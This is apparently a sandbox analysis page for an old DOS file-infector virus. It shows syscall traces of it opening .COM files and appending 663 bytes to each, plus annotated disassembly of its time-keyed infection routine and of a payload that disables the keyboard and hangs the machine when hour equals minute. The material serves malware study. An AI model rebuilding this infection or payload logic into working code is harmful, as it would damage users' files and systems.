Sample viewer

vx.netlux.org/Virus.DOS.Warning.663


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:50:46.702947188Z 26 PC: 12aa2 | Set disk transfer address
2018-12-17T22:50:46.705944717Z 78 PC: 12ab5 | Find first file
2018-12-17T22:50:46.713592137Z 47 PC: 12abb | Get disk transfer address
2018-12-17T22:50:46.7147535Z 67 PC: 12c40 | Get or set file attributes
2018-12-17T22:50:46.720997172Z 67 PC: 12c48 | Get or set file attributes
2018-12-17T22:50:46.952066973Z 61 PC: 12c4e | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:50:46.960813433Z 87 PC: 12c55 | Get or set file date and time
2018-12-17T22:50:46.962970022Z 63 PC: 12af4 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:50:46.971850543Z 66 PC: 12b17 | Move file pointer
2018-12-17T22:50:46.973588792Z 44 PC: 12a6d | Get time 0x12a6d: xor cx, dx
; Disassembly window starting at the return address of the "Get time" call
; (op 44 = INT 21h AH=2Ch, which returns CH=hour, CL=minute, DH=second,
; DL=hundredths). The xor above and the one below fold all four fields into
; CH, giving one time-derived byte. The routine begins before this window.
0x12a6f: xor ch, cl
0x12a71: mov byte ptr [di + 0x10], ch  ; save that byte at [di+0x10]; presumably the key for the routine called next (its body is not on this page)
0x12a74: call 0x22a4e  ; NOTE(review): target looks mis-rendered. A 16-bit near call wraps inside the 64 KiB segment, so the real target is probably 0x12a4e, just before this window; confirm against the raw bytes
0x12a77: pop bx  ; drops one word from the stack (BX is overwritten by the popaw below); the matching push is not in this window
0x12a78: popaw  ; restore the general registers saved before this window
0x12a79: mov ah, byte ptr [di + 9]  ; DOS function number comes from memory, not an immediate; the trace logs op 64 (AH=40h, write) for the int below
0x12a7c: mov cx, 0x297  ; 0x297 = 663 bytes, the size in the sample name and in the logged write
0x12a7f: mov dx, di  ; DS:DX = buffer at DI
0x12a81: int 0x21  ; logged as "Write 663 bytes on handle 5" at PC 12a83; presumably the body being appended to the opened .COM file
0x12a83: pushaw
0x12a84: call 0x22a4e  ; same routine again after the write; presumably undoes the first call's transformation on the in-memory copy (TODO confirm)
0x12a87: pop bx
0x12a88: popaw
0x12a89: ret  ; end of this routine
0x12a8a: xchg di, si  ; start of a different routine; only its first instructions fall inside the window
0x12a8c: pop si
0x12a8d: sub si, 6
0x12a90: push si
0x12a91: add si, 0x185  ; NOTE(review): pop/sub/add on SI looks like a base-address calculation from a return address; cannot be confirmed from this window
2018-12-17T22:50:46.976543512Z 64 PC: 12a83 | Write file or device (Write 663 bytes on handle 5)
2018-12-17T22:50:46.986869101Z 66 PC: 12b35 | Move file pointer
2018-12-17T22:50:46.988834998Z 64 PC: 12b55 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:50:46.997593263Z 87 PC: 12b5e | Get or set file date and time
2018-12-17T22:50:47.00060943Z 62 PC: 12b64 | Close file
2018-12-17T22:50:47.010480724Z 67 PC: 12b6b | Get or set file attributes
2018-12-17T22:50:47.023902564Z 79 PC: 12ab5 | Find next file
2018-12-17T22:50:47.029731489Z 47 PC: 12abb | Get disk transfer address
2018-12-17T22:50:47.032299514Z 67 PC: 12c40 | Get or set file attributes
2018-12-17T22:50:47.044314969Z 67 PC: 12c48 | Get or set file attributes
2018-12-17T22:50:47.057523386Z 61 PC: 12c4e | Open file (Filename = 'PRINT.COM')
2018-12-17T22:50:47.071725514Z 87 PC: 12c55 | Get or set file date and time
2018-12-17T22:50:47.07360473Z 63 PC: 12af4 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:50:47.084949938Z 66 PC: 12b17 | Move file pointer
2018-12-17T22:50:47.088209437Z 44 PC: 12a6d | Get time 0x12a6d: xor cx, dx
; Same window as for the previous file, here for the file opened as 'PRINT.COM'.
; INT 21h AH=2Ch returned CH=hour, CL=minute, DH=second, DL=hundredths; the two
; xors fold them into one byte in CH.
0x12a6f: xor ch, cl
0x12a71: mov byte ptr [di + 0x10], ch  ; time-derived byte saved at [di+0x10]; presumably a key, in which case it differs from file to file
0x12a74: call 0x22a4e  ; NOTE(review): a 16-bit near call wraps inside the segment, so the real target is probably 0x12a4e; confirm against the raw bytes
0x12a77: pop bx
0x12a78: popaw
0x12a79: mov ah, byte ptr [di + 9]  ; function number read from memory; the trace logs op 64 (write)
0x12a7c: mov cx, 0x297  ; 663 bytes
0x12a7f: mov dx, di
0x12a81: int 0x21  ; logged as "Write 663 bytes on handle 5"
0x12a83: pushaw
0x12a84: call 0x22a4e  ; second call to the same routine after the write
0x12a87: pop bx
0x12a88: popaw
0x12a89: ret
0x12a8a: xchg di, si  ; next routine starts here; cut off by the window
0x12a8c: pop si
0x12a8d: sub si, 6
0x12a90: push si
0x12a91: add si, 0x185
2018-12-17T22:50:47.091341967Z 64 PC: 12a83 | Write file or device (Write 663 bytes on handle 5)
2018-12-17T22:50:47.100664187Z 66 PC: 12b35 | Move file pointer
2018-12-17T22:50:47.110982384Z 64 PC: 12b55 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:50:47.127485374Z 87 PC: 12b5e | Get or set file date and time
2018-12-17T22:50:47.129651415Z 62 PC: 12b64 | Close file
2018-12-17T22:50:47.147064467Z 67 PC: 12b6b | Get or set file attributes
2018-12-17T22:50:47.1586774Z 79 PC: 12ab5 | Find next file
2018-12-17T22:50:47.161866793Z 47 PC: 12abb | Get disk transfer address
2018-12-17T22:50:47.164410637Z 67 PC: 12c40 | Get or set file attributes
2018-12-17T22:50:47.171392787Z 67 PC: 12c48 | Get or set file attributes
2018-12-17T22:50:47.182789817Z 61 PC: 12c4e | Open file (Filename = 'HELLO.COM')
2018-12-17T22:50:47.191931231Z 87 PC: 12c55 | Get or set file date and time
2018-12-17T22:50:47.19445821Z 63 PC: 12af4 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:50:47.20252147Z 66 PC: 12b17 | Move file pointer
2018-12-17T22:50:47.204625215Z 44 PC: 12a6d | Get time 0x12a6d: xor cx, dx
; Same window as for the previous files, here for the file opened as 'HELLO.COM'.
; The two xors fold the DOS time fields (CH, CL, DH, DL) into one byte in CH.
0x12a6f: xor ch, cl
0x12a71: mov byte ptr [di + 0x10], ch  ; time-derived byte saved at [di+0x10]; presumably a per-file key
0x12a74: call 0x22a4e  ; NOTE(review): displayed target exceeds the 16-bit segment; real target is probably 0x12a4e
0x12a77: pop bx
0x12a78: popaw
0x12a79: mov ah, byte ptr [di + 9]  ; function number read from memory; logged as op 64 (write)
0x12a7c: mov cx, 0x297  ; 663 bytes
0x12a7f: mov dx, di
0x12a81: int 0x21  ; logged as "Write 663 bytes on handle 5"
0x12a83: pushaw
0x12a84: call 0x22a4e  ; second call to the same routine after the write
0x12a87: pop bx
0x12a88: popaw
0x12a89: ret
0x12a8a: xchg di, si  ; next routine starts here; cut off by the window
0x12a8c: pop si
0x12a8d: sub si, 6
0x12a90: push si
0x12a91: add si, 0x185
2018-12-17T22:50:47.208914605Z 64 PC: 12a83 | Write file or device (Write 663 bytes on handle 5)
2018-12-17T22:50:47.228422135Z 66 PC: 12b35 | Move file pointer
2018-12-17T22:50:47.230478252Z 64 PC: 12b55 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:50:47.239276Z 87 PC: 12b5e | Get or set file date and time
2018-12-17T22:50:47.241831771Z 62 PC: 12b64 | Close file
2018-12-17T22:50:47.250652508Z 67 PC: 12b6b | Get or set file attributes
2018-12-17T22:50:47.263076209Z 79 PC: 12ab5 | Find next file
2018-12-17T22:50:47.267842173Z 47 PC: 12abb | Get disk transfer address
2018-12-17T22:50:47.26941995Z 67 PC: 12c40 | Get or set file attributes
2018-12-17T22:50:47.276233174Z 67 PC: 12c48 | Get or set file attributes
2018-12-17T22:50:47.288504092Z 61 PC: 12c4e | Open file (Filename = 'PHANG.COM')
2018-12-17T22:50:47.296283181Z 87 PC: 12c55 | Get or set file date and time
2018-12-17T22:50:47.298149478Z 63 PC: 12af4 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:50:47.306959627Z 66 PC: 12b17 | Move file pointer
2018-12-17T22:50:47.308997514Z 44 PC: 12a6d | Get time 0x12a6d: xor cx, dx
; Same window as for the previous files, here for the file opened as 'PHANG.COM'.
; The two xors fold the DOS time fields (CH, CL, DH, DL) into one byte in CH.
0x12a6f: xor ch, cl
0x12a71: mov byte ptr [di + 0x10], ch  ; time-derived byte saved at [di+0x10]; presumably a per-file key
0x12a74: call 0x22a4e  ; NOTE(review): displayed target exceeds the 16-bit segment; real target is probably 0x12a4e
0x12a77: pop bx
0x12a78: popaw
0x12a79: mov ah, byte ptr [di + 9]  ; function number read from memory; logged as op 64 (write)
0x12a7c: mov cx, 0x297  ; 663 bytes
0x12a7f: mov dx, di
0x12a81: int 0x21  ; logged as "Write 663 bytes on handle 5"
0x12a83: pushaw
0x12a84: call 0x22a4e  ; second call to the same routine after the write
0x12a87: pop bx
0x12a88: popaw
0x12a89: ret
0x12a8a: xchg di, si  ; next routine starts here; cut off by the window
0x12a8c: pop si
0x12a8d: sub si, 6
0x12a90: push si
0x12a91: add si, 0x185
2018-12-17T22:50:47.312308178Z 64 PC: 12a83 | Write file or device (Write 663 bytes on handle 5)
2018-12-17T22:50:47.322916234Z 66 PC: 12b35 | Move file pointer
2018-12-17T22:50:47.325278134Z 64 PC: 12b55 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:50:47.33351889Z 87 PC: 12b5e | Get or set file date and time
2018-12-17T22:50:47.335974141Z 62 PC: 12b64 | Close file
2018-12-17T22:50:47.344703556Z 67 PC: 12b6b | Get or set file attributes
2018-12-17T22:50:47.355735591Z 79 PC: 12ab5 | Find next file
2018-12-17T22:50:47.359166756Z 47 PC: 12abb | Get disk transfer address
2018-12-17T22:50:47.361587533Z 67 PC: 12c40 | Get or set file attributes
2018-12-17T22:50:47.375943114Z 67 PC: 12c48 | Get or set file attributes
2018-12-17T22:50:47.403151025Z 61 PC: 12c4e | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:50:47.413490447Z 87 PC: 12c55 | Get or set file date and time
2018-12-17T22:50:47.415841983Z 63 PC: 12af4 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:50:47.423315238Z 66 PC: 12b17 | Move file pointer
2018-12-17T22:50:47.425962273Z 44 PC: 12a6d | Get time 0x12a6d: xor cx, dx
; Same window as for the previous files, here for the file opened as 'PRINTA~1.COM'.
; The two xors fold the DOS time fields (CH, CL, DH, DL) into one byte in CH.
0x12a6f: xor ch, cl
0x12a71: mov byte ptr [di + 0x10], ch  ; time-derived byte saved at [di+0x10]; presumably a per-file key
0x12a74: call 0x22a4e  ; NOTE(review): displayed target exceeds the 16-bit segment; real target is probably 0x12a4e
0x12a77: pop bx
0x12a78: popaw
0x12a79: mov ah, byte ptr [di + 9]  ; function number read from memory; logged as op 64 (write)
0x12a7c: mov cx, 0x297  ; 663 bytes
0x12a7f: mov dx, di
0x12a81: int 0x21  ; logged as "Write 663 bytes on handle 5"
0x12a83: pushaw
0x12a84: call 0x22a4e  ; second call to the same routine after the write
0x12a87: pop bx
0x12a88: popaw
0x12a89: ret
0x12a8a: xchg di, si  ; next routine starts here; cut off by the window
0x12a8c: pop si
0x12a8d: sub si, 6
0x12a90: push si
0x12a91: add si, 0x185
2018-12-17T22:50:47.43060213Z 64 PC: 12a83 | Write file or device (Write 663 bytes on handle 5)
2018-12-17T22:50:47.440487433Z 66 PC: 12b35 | Move file pointer
2018-12-17T22:50:47.443318484Z 64 PC: 12b55 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:50:47.451589456Z 87 PC: 12b5e | Get or set file date and time
2018-12-17T22:50:47.453842738Z 62 PC: 12b64 | Close file
2018-12-17T22:50:47.463947501Z 67 PC: 12b6b | Get or set file attributes
2018-12-17T22:50:47.475215615Z 79 PC: 12ab5 | Find next file
2018-12-17T22:50:47.478560125Z 47 PC: 12abb | Get disk transfer address
2018-12-17T22:50:47.48024722Z 67 PC: 12c40 | Get or set file attributes
2018-12-17T22:50:47.488459465Z 67 PC: 12c48 | Get or set file attributes
2018-12-17T22:50:47.499743505Z 61 PC: 12c4e | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:50:47.507557634Z 87 PC: 12c55 | Get or set file date and time
2018-12-17T22:50:47.510424466Z 63 PC: 12af4 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:50:47.518229708Z 66 PC: 12b17 | Move file pointer
2018-12-17T22:50:47.519896612Z 44 PC: 12a6d | Get time 0x12a6d: xor cx, dx
; Same window as for the previous files, here for the file opened as 'MANDEL.COM'.
; The two xors fold the DOS time fields (CH, CL, DH, DL) into one byte in CH.
0x12a6f: xor ch, cl
0x12a71: mov byte ptr [di + 0x10], ch  ; time-derived byte saved at [di+0x10]; presumably a per-file key
0x12a74: call 0x22a4e  ; NOTE(review): displayed target exceeds the 16-bit segment; real target is probably 0x12a4e
0x12a77: pop bx
0x12a78: popaw
0x12a79: mov ah, byte ptr [di + 9]  ; function number read from memory; logged as op 64 (write)
0x12a7c: mov cx, 0x297  ; 663 bytes
0x12a7f: mov dx, di
0x12a81: int 0x21  ; logged as "Write 663 bytes on handle 5"
0x12a83: pushaw
0x12a84: call 0x22a4e  ; second call to the same routine after the write
0x12a87: pop bx
0x12a88: popaw
0x12a89: ret
0x12a8a: xchg di, si  ; next routine starts here; cut off by the window
0x12a8c: pop si
0x12a8d: sub si, 6
0x12a90: push si
0x12a91: add si, 0x185
2018-12-17T22:50:47.523271618Z 64 PC: 12a83 | Write file or device (Write 663 bytes on handle 5)
2018-12-17T22:50:47.533756446Z 66 PC: 12b35 | Move file pointer
2018-12-17T22:50:47.535357976Z 64 PC: 12b55 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:50:47.545151716Z 87 PC: 12b5e | Get or set file date and time
2018-12-17T22:50:47.547401995Z 62 PC: 12b64 | Close file
2018-12-17T22:50:47.556350622Z 67 PC: 12b6b | Get or set file attributes
2018-12-17T22:50:47.56801037Z 79 PC: 12ab5 | Find next file
2018-12-17T22:50:47.571543866Z 47 PC: 12abb | Get disk transfer address
2018-12-17T22:50:47.573394536Z 67 PC: 12c40 | Get or set file attributes
2018-12-17T22:50:47.578113691Z 67 PC: 12c48 | Get or set file attributes
2018-12-17T22:50:47.585238874Z 61 PC: 12c4e | Open file (Filename = 'PAH.COM')
2018-12-17T22:50:47.592932764Z 87 PC: 12c55 | Get or set file date and time
2018-12-17T22:50:47.594811711Z 63 PC: 12af4 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:50:47.604274942Z 66 PC: 12b17 | Move file pointer
2018-12-17T22:50:47.606595381Z 44 PC: 12a6d | Get time 0x12a6d: xor cx, dx
; Same window as for the previous files, here for the file opened as 'PAH.COM'.
; The two xors fold the DOS time fields (CH, CL, DH, DL) into one byte in CH.
0x12a6f: xor ch, cl
0x12a71: mov byte ptr [di + 0x10], ch  ; time-derived byte saved at [di+0x10]; presumably a per-file key
0x12a74: call 0x22a4e  ; NOTE(review): displayed target exceeds the 16-bit segment; real target is probably 0x12a4e
0x12a77: pop bx
0x12a78: popaw
0x12a79: mov ah, byte ptr [di + 9]  ; function number read from memory; logged as op 64 (write)
0x12a7c: mov cx, 0x297  ; 663 bytes
0x12a7f: mov dx, di
0x12a81: int 0x21  ; logged as "Write 663 bytes on handle 5"
0x12a83: pushaw
0x12a84: call 0x22a4e  ; second call to the same routine after the write
0x12a87: pop bx
0x12a88: popaw
0x12a89: ret
0x12a8a: xchg di, si  ; next routine starts here; cut off by the window
0x12a8c: pop si
0x12a8d: sub si, 6
0x12a90: push si
0x12a91: add si, 0x185
2018-12-17T22:50:47.609632529Z 64 PC: 12a83 | Write file or device (Write 663 bytes on handle 5)
2018-12-17T22:50:47.621570638Z 66 PC: 12b35 | Move file pointer
2018-12-17T22:50:47.623366164Z 64 PC: 12b55 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:50:47.630910326Z 87 PC: 12b5e | Get or set file date and time
2018-12-17T22:50:47.633577265Z 62 PC: 12b64 | Close file
2018-12-17T22:50:47.642685565Z 67 PC: 12b6b | Get or set file attributes
2018-12-17T22:50:47.654498455Z 79 PC: 12ab5 | Find next file
2018-12-17T22:50:47.658862365Z 47 PC: 12abb | Get disk transfer address
2018-12-17T22:50:47.666071086Z 67 PC: 12c40 | Get or set file attributes
2018-12-17T22:50:47.672423087Z 67 PC: 12c48 | Get or set file attributes
2018-12-17T22:50:47.695070369Z 61 PC: 12c4e | Open file (Filename = 'TEST.COM')
2018-12-17T22:50:47.703852358Z 87 PC: 12c55 | Get or set file date and time
2018-12-17T22:50:47.705902747Z 63 PC: 12af4 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:50:47.713505096Z 87 PC: 12b5e | Get or set file date and time
2018-12-17T22:50:47.716605534Z 62 PC: 12b64 | Close file
2018-12-17T22:50:47.730231063Z 67 PC: 12b6b | Get or set file attributes
2018-12-17T22:50:47.74107809Z 79 PC: 12ab5 | Find next file
2018-12-17T22:50:47.745543345Z 78 PC: 12c03 | Find first file
2018-12-17T22:50:47.752216631Z 78 PC: 12c03 | Find first file
2018-12-17T22:50:47.760339078Z 78 PC: 12b95 | Find first file
2018-12-17T22:50:47.768080262Z 44 PC: 12cc2 | Get time 0x12cc2: cmp ch, cl
; Disassembly window starting at the return address of a "Get time" call
; (INT 21h AH=2Ch: CH=hour, CL=minute). The compare above is the trigger
; test: the payload below runs only when hour == minute. In this run the next
; logged call is at PC 12ad4, so the ret path was taken.
0x12cc4: je 0x12cc7  ; equal -> payload
0x12cc6: ret  ; not equal -> return to the caller (outside this window)
0x12cc7: cli
0x12cc8: mov al, 0xad
0x12cca: out 0x64, al  ; port 0x64 is the keyboard-controller command port; command 0xAD disables the keyboard interface
0x12ccc: nop
0x12ccd: sti
0x12cce: mov dx, di
0x12cd0: add dx, 0x215  ; DX = DI + 0x215, address of the '$'-terminated message
0x12cd4: mov ah, 9
0x12cd6: int 0x21  ; INT 21h AH=09h, display string
0x12cd8: cli
0x12cd9: jmp 0x12cd9  ; jump-to-self with maskable interrupts off: execution never leaves this instruction
0x12cdb: add word ptr [bx], di  ; NOTE(review): unreachable after the self-jump; the bytes from here on (01 3F 3F ...) are most likely data decoded as instructions
0x12cdd: aas  ; 0x3F is also ASCII '?'
0x12cde: aas
0x12cdf: aas
0x12ce0: aas
0x12ce1: aas
2018-12-17T22:50:47.771353985Z 26 PC: 12ad4 | Set disk transfer address

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":10339,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:27:44.423739198Z 26 PC: 12aa2 | Set disk transfer address
2018-12-25T12:27:44.424807429Z 78 PC: 12ab5 | Find first file
2018-12-25T12:27:44.431187118Z 47 PC: 12abb | Get disk transfer address
2018-12-25T12:27:44.433122654Z 67 PC: 12c40 | Get or set file attributes
2018-12-25T12:27:44.438569491Z 67 PC: 12c48 | Get or set file attributes
2018-12-25T12:27:44.45362464Z 61 PC: 12c4e | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:27:44.460501757Z 87 PC: 12c55 | Get or set file date and time
2018-12-25T12:27:44.461969103Z 63 PC: 12af4 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:27:44.468147486Z 66 PC: 12b17 | Move file pointer
2018-12-25T12:27:44.473969234Z 44 PC: 12a6d | Get time 0x12a6d: xor cx, dx
; Disassembly window starting at the return address of the "Get time" call
; (op 44 = INT 21h AH=2Ch: CH=hour, CL=minute, DH=second, DL=hundredths),
; here for the file opened as 'SLEEP.COM'. The xor above and the one below
; fold all four fields into one byte in CH. The routine begins before this window.
0x12a6f: xor ch, cl
0x12a71: mov byte ptr [di + 0x10], ch  ; save that byte at [di+0x10]; presumably the key for the routine called next
0x12a74: call 0x22a4e  ; NOTE(review): a 16-bit near call wraps inside the 64 KiB segment, so the real target is probably 0x12a4e; confirm against the raw bytes
0x12a77: pop bx  ; drops one word (BX is overwritten by the popaw below); the matching push is not in this window
0x12a78: popaw
0x12a79: mov ah, byte ptr [di + 9]  ; function number read from memory; the trace logs op 64 (AH=40h, write)
0x12a7c: mov cx, 0x297  ; 0x297 = 663 bytes, matching the logged write
0x12a7f: mov dx, di  ; DS:DX = buffer at DI
0x12a81: int 0x21  ; logged as "Write 663 bytes on handle 5" at PC 12a83
0x12a83: pushaw
0x12a84: call 0x22a4e  ; same routine again after the write; presumably undoes the first call on the in-memory copy (TODO confirm)
0x12a87: pop bx
0x12a88: popaw
0x12a89: ret
0x12a8a: xchg di, si  ; start of a different routine; cut off by the window
0x12a8c: pop si
0x12a8d: sub si, 6
0x12a90: push si
0x12a91: add si, 0x185
2018-12-25T12:27:44.484394105Z 64 PC: 12a83 | Write file or device (Write 663 bytes on handle 5)
2018-12-25T12:27:44.492971087Z 66 PC: 12b35 | Move file pointer
2018-12-25T12:27:44.495200085Z 64 PC: 12b55 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:27:44.501939388Z 87 PC: 12b5e | Get or set file date and time
2018-12-25T12:27:44.503285881Z 62 PC: 12b64 | Close file
2018-12-25T12:27:44.511167596Z 67 PC: 12b6b | Get or set file attributes
2018-12-25T12:27:44.520786246Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:44.523268559Z 47 PC: 12abb | Get disk transfer address (See above)
2018-12-25T12:27:44.524444195Z 67 PC: 12c40 | Get or set file attributes (See above)
2018-12-25T12:27:44.530410967Z 67 PC: 12c48 | Get or set file attributes (See above)
2018-12-25T12:27:44.540167801Z 61 PC: 12c4e | Open file (See above)
2018-12-25T12:27:44.548774931Z 87 PC: 12c55 | Get or set file date and time (See above)
2018-12-25T12:27:44.55027966Z 63 PC: 12af4 | Read file or device (See above)
2018-12-25T12:27:44.554293879Z 66 PC: 12b17 | Move file pointer (See above)
2018-12-25T12:27:44.555254899Z 44 PC: 12a6d | Get time (See above)
2018-12-25T12:27:44.557479588Z 64 PC: 12a83 | Write file or device (See above)
2018-12-25T12:27:44.566302118Z 66 PC: 12b35 | Move file pointer (See above)
2018-12-25T12:27:44.567523427Z 64 PC: 12b55 | Write file or device (See above)
2018-12-25T12:27:44.572448742Z 87 PC: 12b5e | Get or set file date and time (See above)
2018-12-25T12:27:44.574282036Z 62 PC: 12b64 | Close file (See above)
2018-12-25T12:27:44.58226784Z 67 PC: 12b6b | Get or set file attributes (See above)
2018-12-25T12:27:44.593956039Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:44.596026961Z 47 PC: 12abb | Get disk transfer address (See above)
2018-12-25T12:27:44.597103069Z 67 PC: 12c40 | Get or set file attributes (See above)
2018-12-25T12:27:44.603535391Z 67 PC: 12c48 | Get or set file attributes (See above)
2018-12-25T12:27:44.61377201Z 61 PC: 12c4e | Open file (See above)
2018-12-25T12:27:44.625236061Z 87 PC: 12c55 | Get or set file date and time (See above)
2018-12-25T12:27:44.627539836Z 63 PC: 12af4 | Read file or device (See above)
2018-12-25T12:27:44.634525585Z 66 PC: 12b17 | Move file pointer (See above)
2018-12-25T12:27:44.636178198Z 44 PC: 12a6d | Get time (See above)
2018-12-25T12:27:44.638990803Z 64 PC: 12a83 | Write file or device (See above)
2018-12-25T12:27:44.647468094Z 66 PC: 12b35 | Move file pointer (See above)
2018-12-25T12:27:44.648718395Z 64 PC: 12b55 | Write file or device (See above)
2018-12-25T12:27:44.655342123Z 87 PC: 12b5e | Get or set file date and time (See above)
2018-12-25T12:27:44.657122655Z 62 PC: 12b64 | Close file (See above)
2018-12-25T12:27:44.664629755Z 67 PC: 12b6b | Get or set file attributes (See above)
2018-12-25T12:27:44.674152424Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:44.678289725Z 47 PC: 12abb | Get disk transfer address (See above)
2018-12-25T12:27:44.679404704Z 67 PC: 12c40 | Get or set file attributes (See above)
2018-12-25T12:27:44.685209873Z 67 PC: 12c48 | Get or set file attributes (See above)
2018-12-25T12:27:44.696545784Z 61 PC: 12c4e | Open file (See above)
2018-12-25T12:27:44.702919582Z 87 PC: 12c55 | Get or set file date and time (See above)
2018-12-25T12:27:44.70416325Z 63 PC: 12af4 | Read file or device (See above)
2018-12-25T12:27:44.713877918Z 66 PC: 12b17 | Move file pointer (See above)
2018-12-25T12:27:44.723097727Z 44 PC: 12a6d | Get time (See above)
2018-12-25T12:27:44.725424222Z 64 PC: 12a83 | Write file or device (See above)
2018-12-25T12:27:44.734022291Z 66 PC: 12b35 | Move file pointer (See above)
2018-12-25T12:27:44.735405638Z 64 PC: 12b55 | Write file or device (See above)
2018-12-25T12:27:44.74169278Z 87 PC: 12b5e | Get or set file date and time (See above)
2018-12-25T12:27:44.744199207Z 62 PC: 12b64 | Close file (See above)
2018-12-25T12:27:44.751917468Z 67 PC: 12b6b | Get or set file attributes (See above)
2018-12-25T12:27:44.761608301Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:44.766047861Z 47 PC: 12abb | Get disk transfer address (See above)
2018-12-25T12:27:44.767568987Z 67 PC: 12c40 | Get or set file attributes (See above)
2018-12-25T12:27:44.773445276Z 67 PC: 12c48 | Get or set file attributes (See above)
2018-12-25T12:27:44.783339614Z 61 PC: 12c4e | Open file (See above)
2018-12-25T12:27:44.789753639Z 87 PC: 12c55 | Get or set file date and time (See above)
2018-12-25T12:27:44.791065175Z 63 PC: 12af4 | Read file or device (See above)
2018-12-25T12:27:44.79794786Z 66 PC: 12b17 | Move file pointer (See above)
2018-12-25T12:27:44.799194814Z 44 PC: 12a6d | Get time (See above)
2018-12-25T12:27:44.801399648Z 64 PC: 12a83 | Write file or device (See above)
2018-12-25T12:27:44.810117818Z 66 PC: 12b35 | Move file pointer (See above)
2018-12-25T12:27:44.811636247Z 64 PC: 12b55 | Write file or device (See above)
2018-12-25T12:27:44.818082872Z 87 PC: 12b5e | Get or set file date and time (See above)
2018-12-25T12:27:44.820959727Z 62 PC: 12b64 | Close file (See above)
2018-12-25T12:27:44.828509892Z 67 PC: 12b6b | Get or set file attributes (See above)
2018-12-25T12:27:44.837227026Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:44.840769375Z 47 PC: 12abb | Get disk transfer address (See above)
2018-12-25T12:27:44.8420156Z 67 PC: 12c40 | Get or set file attributes (See above)
2018-12-25T12:27:44.847325549Z 67 PC: 12c48 | Get or set file attributes (See above)
2018-12-25T12:27:44.857802982Z 61 PC: 12c4e | Open file (See above)
2018-12-25T12:27:44.864901107Z 87 PC: 12c55 | Get or set file date and time (See above)
2018-12-25T12:27:44.866696188Z 63 PC: 12af4 | Read file or device (See above)
2018-12-25T12:27:44.873917322Z 66 PC: 12b17 | Move file pointer (See above)
2018-12-25T12:27:44.875758879Z 44 PC: 12a6d | Get time (See above)
2018-12-25T12:27:44.878466775Z 64 PC: 12a83 | Write file or device (See above)
2018-12-25T12:27:44.888369384Z 66 PC: 12b35 | Move file pointer (See above)
2018-12-25T12:27:44.889753091Z 64 PC: 12b55 | Write file or device (See above)
2018-12-25T12:27:44.895976056Z 87 PC: 12b5e | Get or set file date and time (See above)
2018-12-25T12:27:44.898149587Z 62 PC: 12b64 | Close file (See above)
2018-12-25T12:27:44.906067362Z 67 PC: 12b6b | Get or set file attributes (See above)
2018-12-25T12:27:44.915811282Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:44.918531241Z 47 PC: 12abb | Get disk transfer address (See above)
2018-12-25T12:27:44.920145396Z 67 PC: 12c40 | Get or set file attributes (See above)
2018-12-25T12:27:44.925526587Z 67 PC: 12c48 | Get or set file attributes (See above)
2018-12-25T12:27:44.934905511Z 61 PC: 12c4e | Open file (See above)
2018-12-25T12:27:44.942521487Z 87 PC: 12c55 | Get or set file date and time (See above)
2018-12-25T12:27:44.944156309Z 63 PC: 12af4 | Read file or device (See above)
2018-12-25T12:27:44.950637598Z 66 PC: 12b17 | Move file pointer (See above)
2018-12-25T12:27:44.952951163Z 44 PC: 12a6d | Get time (See above)
2018-12-25T12:27:44.955640036Z 64 PC: 12a83 | Write file or device (See above)
2018-12-25T12:27:44.963966705Z 66 PC: 12b35 | Move file pointer (See above)
2018-12-25T12:27:44.966255806Z 64 PC: 12b55 | Write file or device (See above)
2018-12-25T12:27:44.973024666Z 87 PC: 12b5e | Get or set file date and time (See above)
2018-12-25T12:27:44.974783201Z 62 PC: 12b64 | Close file (See above)
2018-12-25T12:27:44.983297736Z 67 PC: 12b6b | Get or set file attributes (See above)
2018-12-25T12:27:44.992942472Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:44.995768669Z 47 PC: 12abb | Get disk transfer address (See above)
2018-12-25T12:27:44.998474381Z 67 PC: 12c40 | Get or set file attributes (See above)
2018-12-25T12:27:45.004172577Z 67 PC: 12c48 | Get or set file attributes (See above)
2018-12-25T12:27:45.013714502Z 61 PC: 12c4e | Open file (See above)
2018-12-25T12:27:45.026382565Z 87 PC: 12c55 | Get or set file date and time (See above)
2018-12-25T12:27:45.027708396Z 63 PC: 12af4 | Read file or device (See above)
2018-12-25T12:27:45.034188159Z 87 PC: 12b5e | Get or set file date and time (See above)
2018-12-25T12:27:45.036538447Z 62 PC: 12b64 | Close file (See above)
2018-12-25T12:27:45.043702872Z 67 PC: 12b6b | Get or set file attributes (See above)
2018-12-25T12:27:45.053208456Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:45.056736667Z 78 PC: 12c03 | Find first file
2018-12-25T12:27:45.062701806Z 78 PC: 12c03 | Find first file (See above)
2018-12-25T12:27:45.068852765Z 78 PC: 12b95 | Find first file
